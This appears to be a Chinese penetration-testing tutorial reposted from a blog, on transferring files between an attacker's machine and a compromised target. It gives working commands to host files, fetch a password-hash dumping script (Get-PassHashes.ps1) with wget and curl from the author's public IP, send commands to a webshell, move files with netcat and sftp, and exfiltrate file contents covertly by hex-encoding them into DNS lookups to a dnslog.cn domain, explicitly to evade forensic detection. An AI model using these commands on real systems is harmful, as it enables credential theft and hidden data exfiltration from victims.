介绍
文件上传一般分为上传和下载,下面我所指的下载具体指的是攻击机(本地机器)向目标机(服务器)传输文件。而上传则相反是从目标中收集下载文件!如果让目标机器下载,我们大多数时候都需要先把需要下载的文件挂载出来!
攻击机挂载文件
Python脚本挂载
python -m SimpleHTTPServer
python3 -m http.server 端口
python -m http.server 端口 --directory 指定文件
nohup python3 -m http.server &
使用阿帕奇服务挂载
yum install httpd.x86_64
systemctl status httpd.service
echo "测试" > /var/www/html/index.html
systemctl restart httpd.service
vim /etc/httpd/conf/httpd.conf
systemctl restart httpd.service
方面下面攻击测试,将攻击机的python和阿帕奇服务都启动起来了!(个人小服务器,各位表哥没事别打,我就不打码了!)
http://43.128.11.131/和http://43.128.11.131:8000/
传输文件
wget
这个命令的主要功能就是用来从指定的URL下载文件。官方定义:非交互式的网络文件下载工具。这是一个单项的,只能下载文件的命令。
wget -h
wget 目标地址
wget http://43.128.11.131:8000/Get-PassHashes.ps1
wget -q -O 名字 目标地址
wget -q -O Windows收集信息脚本.ps1 http://43.128.11.131:8000/Get-PassHashes.ps1
curl
这个命令用来请求 Web 服务器的命令行工具,但可以使用其-o
或-O
参数来进行文件下载。
curl -O 目标地址
curl -O http://43.128.11.131:8000/Get-PassHashes.ps1
curl -o 名字 目标地址
curl -o Windows收集信息脚本.ps1 http://43.128.11.131:8000/Get-PassHashes.ps1
curl -X 访问方式 -d "命令" 目标网络控制台(webshell)地址
curl -X POST -d "CMD=whoami" http://43.128.11.131:8000/
netcat
netcat简称nc,他是一个功能十分强大的网络工具,但在很多Linux中并不会携带,需要我们手动安装!
netcat安装和详细使用介绍: http://note.youdao.com/s/Nxf2xYKz
yum -y install nc
cat 文件名 | nc -l 端口
cat 1.txt | nc -l 1234
nc 目标地址 端口 > 文件名
nc 43.128.11.131 1234 > 服务器下载文件.txt
nc host_ip 1234 < file1
nc -lvvp 1234 > file2
sftp
这个是和我们ssh比较类似的一个服务,是一个交互式文件传输程序,并且支持公私钥的认证(这里的公私钥使用的是和ssh共享的公私钥文件)。
chcp 65001
sftp 用户名@目标地址
sftp root@192.168.1.1
sftp -P 端口 用户名@目标地址
sftp -P 端口 -i 私钥 用户名@目标地址
sftp -P 22 root@192.168.1.1
sftp -P 22 -i ~/.ssh/id_rsa root@192.168.1.1
put [本地文件的地址] [服务器上文件存储的位置]
get [服务器上文件存储的位置] [本地要存储的位置]
其他方法
上述传输数据都使用了一些Linux内置的命令或服务,比较容易被查到记录哪来取证, 或被禁用,下面用一些不容易被发现的方法(即使被发现也很难取证)来获取目标主机数据!
DNS传输数据
这是一种比较隐蔽的传输数据方法,但我们需要DNSlog之类的工具接收数据!和使用一些工具来进行解密,在线加密解密工具
cat 文件名 | xxd -p -c 16 | while read 变量名; do host $变量名.dnslog; done
cat 1.txt | xxd -p -c 16 | while read i; do host $i.e578nr.dnslog.cn; done
基于上述命令可以做一些其他变种,比如把编码方式改变xxd -p -c 16
用的是Hex编码,我们还要尝试将其换成其他编码(甚至多层编码,来进行传输)
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)